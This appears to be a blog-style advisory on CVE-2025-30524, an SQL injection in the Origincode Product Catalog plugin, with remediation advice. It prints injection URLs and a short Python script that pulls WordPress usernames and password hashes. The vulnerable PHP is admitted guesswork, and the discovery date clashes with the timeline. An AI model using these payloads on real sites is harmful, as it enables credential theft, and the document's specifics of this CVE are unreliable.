CVE-2025-30524 - SQL Injection in Origincode Product Catalog (≤1..4) – How Attackers Can Steal Your Data

In June 2025, a serious security vulnerability (CVE-2025-30524) was discovered in Origincode's Product Catalog plugin, versions up to and including 1..4. If you use this plugin on your website, attackers could gain unauthorized access to your database with a simple trick: SQL Injection.

Let's break down what this means, see the technical details, and understand how hackers might exploit it. We'll also point you to the original resources for more information.

What is SQL Injection?

SQL Injection (SQLi) is a type of vulnerability where an attacker tricks your application into running malicious SQL code. It happens when user inputs are not properly “neutralized” (sanitized/escaped) before being put in SQL statements.

About CVE-2025-30524

Vulnerability: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Affected Product: Origincode Product Catalog
Version: From n/a through 1..4 (all versions up to and including 1..4)
CVE: CVE-2025-30524
Exploitability: Remote, easy to trigger with basic skills

This vulnerability exists because the plugin doesn’t sanitize user input before it’s used in SQL queries.

Imagine the plugin allows users to search for products using a special URL like this

https://yourstore.com/?product_id=123

Inside the code, it might do something like this in PHP

$product_id = $_GET['product_id'];
$query = "SELECT * FROM products WHERE product_id = '$product_id'";
$result = mysqli_query($conn, $query);

Problem:

There’s no check or sanitation on $product_id. An attacker can change the URL and inject SQL

https://yourstore.com/?product_id=123' OR '1'='1

Now the SQL query looks like this

SELECT * FROM products WHERE product_id = '123' OR '1'='1'

This always returns all products—bypassing controls. With more complex injections, attackers could even extract admin passwords.

Malicious Query

https://yourstore.com/?product_id='; UNION SELECT user_login, user_pass FROM wp_users--

Exploit Code Snippet (for educational purpose)

import requests

url = "https://yourstore.com/";
injection = "' UNION SELECT user_login,user_pass FROM wp_users--"
params = {'product_id': injection}
response = requests.get(url, params=params)
print(response.text)

What Should You Do?

If You Use Origincode Product Catalog:
- Update to the latest, patched version (Check Origincode’s site).

If no patch is available, disable the plugin until fixed.

Dev Advice: Always sanitize user input!

Use parameterized queries

$stmt = $conn->prepare("SELECT * FROM products WHERE product_id = ?");
$stmt->bind_param('s', $_GET['product_id']);
$stmt->execute();

References & Further Reading

- MITRE: CVE-2025-30524
- OWASP SQL Injection Guide
- Origincode Product Catalog Plugin
- WordPress Plugin Directory

Bottom Line

CVE-2025-30524 can let attackers steal your store data, user passwords, and more using a simple URL trick—because special characters in inputs aren't checked. Always keep your plugins updated and never trust user input without checking!

If you’re a site owner, patch or disable the plugin immediately. If you’re a developer, learn from this: parameterize your SQL!

Timeline

Published on: 03/26/2025 15:16:22 UTC
Last modified on: 03/27/2025 16:45:27 UTC